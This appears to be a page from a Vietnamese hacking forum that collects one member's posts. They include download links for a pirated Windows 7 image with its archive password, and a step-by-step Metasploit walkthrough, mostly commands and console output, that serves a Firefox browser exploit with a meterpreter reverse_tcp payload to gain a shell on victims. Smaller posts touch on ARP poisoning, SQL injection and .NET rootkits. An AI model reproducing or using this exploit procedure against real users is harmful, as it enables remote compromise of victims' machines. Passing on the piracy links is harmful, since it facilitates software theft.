banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: hoahongtim  XML
Profile for hoahongtim Messages posted by hoahongtim [ number of posts not being displayed on this page: 17 ]
 
Giang sơn dể đổi, bản tính khó dời smilie
Bác nào cần download thì download nhé, còn actived thì chịu khó google smilie
Code:
http://oron.com/jidufyu2qbam/Gxc.OS.W7-Ultimate-x86_UDS.part23.rar.html
 http://oron.com/eziuk8n6jiqi/Gxc.OS.W7-Ultimate-x86_UDS.part12.rar.html
 http://oron.com/tb38y9xjfive/Gxc.OS.W7-Ultimate-x86_UDS.part24.rar.html
 http://oron.com/ow1v7ksvusjt/Gxc.OS.W7-Ultimate-x86_UDS.part01.rar.html
 http://oron.com/c5ymgv9jsxf4/Gxc.OS.W7-Ultimate-x86_UDS.part02.rar.html
 http://oron.com/4qigdsuq62iq/Gxc.OS.W7-Ultimate-x86_UDS.part03.rar.html
 http://oron.com/8fqihyp20o5v/Gxc.OS.W7-Ultimate-x86_UDS.part04.rar.html
 http://oron.com/8qp65qy7vz5l/Gxc.OS.W7-Ultimate-x86_UDS.part05.rar.html
 http://oron.com/2soi4zgphkxn/Gxc.OS.W7-Ultimate-x86_UDS.part06.rar.html
 http://oron.com/frhdas3s7tbo/Gxc.OS.W7-Ultimate-x86_UDS.part07.rar.html
 http://oron.com/lu5hz3msvvah/Gxc.OS.W7-Ultimate-x86_UDS.part08.rar.html
 http://oron.com/usrbyzt52jqg/Gxc.OS.W7-Ultimate-x86_UDS.part09.rar.html
 http://oron.com/4uf8flbe7y7o/Gxc.OS.W7-Ultimate-x86_UDS.part10.rar.html
 http://oron.com/qr4xlj4bne55/Gxc.OS.W7-Ultimate-x86_UDS.part11.rar.html
 http://oron.com/hml8h80lg1vr/Gxc.OS.W7-Ultimate-x86_UDS.part13.rar.html
 http://oron.com/fy443ymyblar/Gxc.OS.W7-Ultimate-x86_UDS.part14.rar.html
 http://oron.com/hznzy18vd2jo/Gxc.OS.W7-Ultimate-x86_UDS.part15.rar.html
 http://oron.com/ivnaov18e1b0/Gxc.OS.W7-Ultimate-x86_UDS.part16.rar.html
 http://oron.com/2rb14vv2jqp0/Gxc.OS.W7-Ultimate-x86_UDS.part17.rar.html
 http://oron.com/c66yfi27w0yb/Gxc.OS.W7-Ultimate-x86_UDS.part18.rar.html
 http://oron.com/kjzl2fohx0ix/Gxc.OS.W7-Ultimate-x86_UDS.part19.rar.html
 http://oron.com/7o1tuw9otqo7/Gxc.OS.W7-Ultimate-x86_UDS.part20.rar.html
 http://oron.com/7qs7m2ig0y8m/Gxc.OS.W7-Ultimate-x86_UDS.part21.rar.html
 http://oron.com/fv0z2euvohct/Gxc.OS.W7-Ultimate-x86_UDS.part22.rar.html
 http://oron.com/ofk6eufdev2j/Gxc.OS.en_windows_7_ultimate_x86_dvd_X15-65921_UDS.txt.html


Password unar : ut@updatesofts.com

Code:
http://ul.to/h7pqn7/Gxc.OS.W7-Ultimate-x86_UDS.part02.rar
 http://ul.to/ax84tv/Gxc.OS.W7-Ultimate-x86_UDS.part01.rar
 http://ul.to/5×4ibh/Gxc.OS.W7-Ultimate-x86_UDS.part03.rar
 http://ul.to/fvyf1i/Gxc.OS.W7-Ultimate-x86_UDS.part04.rar
 http://ul.to/tuga8b/Gxc.OS.W7-Ultimate-x86_UDS.part05.rar
 http://ul.to/5xvm8s/Gxc.OS.W7-Ultimate-x86_UDS.part06.rar
 http://ul.to/1dn5xr/Gxc.OS.W7-Ultimate-x86_UDS.part08.rar
 http://ul.to/j5uvv7/Gxc.OS.W7-Ultimate-x86_UDS.part07.rar
 http://ul.to/p0rzo6/Gxc.OS.W7-Ultimate-x86_UDS.part09.rar
 http://ul.to/9t1ofl/Gxc.OS.W7-Ultimate-x86_UDS.part10.rar
 http://ul.to/011ida/Gxc.OS.W7-Ultimate-x86_UDS.part11.rar
 http://ul.to/2h4cbl/Gxc.OS.W7-Ultimate-x86_UDS.part12.rar
 http://ul.to/nkkyrd/Gxc.OS.W7-Ultimate-x86_UDS.part13.rar
 http://ul.to/931xle/Gxc.OS.W7-Ultimate-x86_UDS.part14.rar
 http://ul.to/0eudr7/Gxc.OS.W7-Ultimate-x86_UDS.part15.rar
 http://ul.to/ctqb5l/Gxc.OS.W7-Ultimate-x86_UDS.part16.rar
 http://ul.to/hy5748/Gxc.OS.W7-Ultimate-x86_UDS.part17.rar
 http://ul.to/51i0du/Gxc.OS.W7-Ultimate-x86_UDS.part18.rar
 http://ul.to/ws0qqw/Gxc.OS.W7-Ultimate-x86_UDS.part19.rar
 http://ul.to/1hwsr7/Gxc.OS.W7-Ultimate-x86_UDS.part20.rar
 http://ul.to/zlvnop/Gxc.OS.W7-Ultimate-x86_UDS.part21.rar
 http://ul.to/descsk/Gxc.OS.W7-Ultimate-x86_UDS.part22.rar
 http://ul.to/3b79a0/Gxc.OS.W7-Ultimate-x86_UDS.part24.rar
 http://ul.to/cdaa64/Gxc.OS.W7-Ultimate-x86_UDS.part23.rar


Password unar : ut@updatesofts.com

Link download có thể thay thế cho nhau smilie
Nếu chưa biết cả Perl và Python, thì nên học Python đi smilie
Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from nmap.org. This is the first stable release since 4.76 (last September), and the first major release since the 4.50 release in 2007, download : http://nmap.org/download.html
Netcut dùng ARP để đầu độc, giống như CAIN, còn link download thì google.com sẽ có tất cả cho bạn.
Cách Anti thì một là bạn chạy Netcut rồi chọn chức năng Protect my computer gì đó, hoặc là đặt static MAC Address smilie cách chống giống như chống CAIN smilie
Kaspersky vừa mới xử xong em này smilie

Cách dùng 0-day này với metasploit (mình dùng reverse_tcp nha):

msf > use exploit/multi/browser/firefox_escape_retval

msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
 


msf exploit(firefox_escape_retval) > show options 



Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Use SSL

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process

LHOST yes The local address

LPORT 4444 yes The local port

Exploit target:

Id Name

-- ----

0 Firefox 3.5.0 on Windows XP SP0-SP3 


SRVPORT hiện là 8080, thay đổi lại thành 80 cho dễ dùng, và set url Path luôn nha :

msf exploit(firefox_escape_retval) > set SRVPORT 80

SRVPORT => 80

msf exploit(firefox_escape_retval) > set URIPATH index.html

URIPATH => index.html 


Nhớ set lại IP để reverse về nhé :

msf exploit(firefox_escape_retval) > set LHOST 203.162.11.12

LHOST => 203.162.11.12
 


Lúc này server sẽ lắng nghe ở port 4444, nếu cần thì thay đổi lại cho phù hợp.

bắt đầu run exploit

msf exploit(firefox_escape_retval) > exploit 




[*] Exploit running as background job.

msf exploit(firefox_escape_retval) >

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Using url: http://0.0.0.0:80/index.html

[*] Local IP: http://203.162.11.12:80/index.html

[*] Server started. 


Sau khi victim run address xong, ta có được shell rồi, tiếp theo interaction vào session để có shell

msf exploit(firefox_escape_retval) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > ipconfig 


.................. làm gì nữa thì tùy nha, tuy nhiên nếu firefox cash hoặc victim đóng lại thì mất shell, vì thế khi có shell rồi tranh thủ nhanh tay làm cái gì đó thì làm nha smilie
Ai lại chơi chuyện "xúi" người ta hack web này web nọ vậy smilie Sao bạn không tự mình làm đi smilie, còn nếu nhờ ai đó thì nên private message đi smilie
MySQL không support multi query, khi bạn order thì nó true, nhưng khi dùng UNION thì có lẽ là không được, với dạng multi query thì có lẽ dùng kỷ thuật blind là hợp lý. MySQLI thì lại có multi query smilie
Bác nào cho mình hỏi tí, nếu chạy liên tục vài lần thì nhận được thông báo như sau, tràn bộ đệm interger là sao nhĩ ? Mặc dù vẫn lấy được user và password.

D:\www\exploit\wargame\level0.py:15: DeprecationWarning: struct integer overflow
masking is deprecated
sock.send(pack('<I',sum))
Mới vào blackhat xem thông tin, đề tài này cũng sẽ được trình bày vào tháng 4-2009.
Link : http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html

Erez Metula
.NET Framework Rootkits: Backdoors inside your Framework

This presentation introduces application level rootkit attacks on managed code environments, enabling an attacker to change the language runtime implementation, and to hide malicious code inside its core. This presentation focuses on the .NET Framework, while covering various ways to develop malware (rootkits,backdoors,logic manipulation, etc.) for the .NET framework, by changing its behavior. It includes demos of information logging, reverse shells, backdoors, encryption keys fixation, and other nasty things.

This presentation also introduces ".Net-Sploit" - a new tool for building MSIL malware that will enable the user to inject preloaded/custom payload to the Framework core DLL.

The Whitepaper, .NET-Sploit, and source code can be found here

Erez Metula is a senior application security consultant, working as the application security department manager at 2BSecure. He has extensive hands-on experience performing security assessments, secure development consulting & training for clients in Israel and abroad such as banks, financial organizations, military, software development companies, telecom, and more. Erez is also a leading instructor for many information security training, especially on secure software development methodologies & techniques. He had lectured on advanced .NET security (and other development platforms) for worldwide organizations and is constant speaker for conferences such as Microsoft .NET Security User Group, OWASP (Open Web Application Security Project), and more. He holds a CISSP certification and is toward graduation of Msc in computer science.
 
 
@meomeo_bebong: bạn có thể upload lên mediafire.com hoặc rapidshare.com, cái nào cũng được.
Cài cái BitTorrent vào là down thôi. Còn muốn download nhanh hơn thì cấu hình mở port cho modem, google một chút là ra hết.
Good ! smilie Anh em có sách hay CD Live thì cứ đóng góp lên Topic, hy vọng thời gian sắp tới chúng ta làm đủ bộ hakin9.
 
Go to Page:  First Page Page 1 3 4 5 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|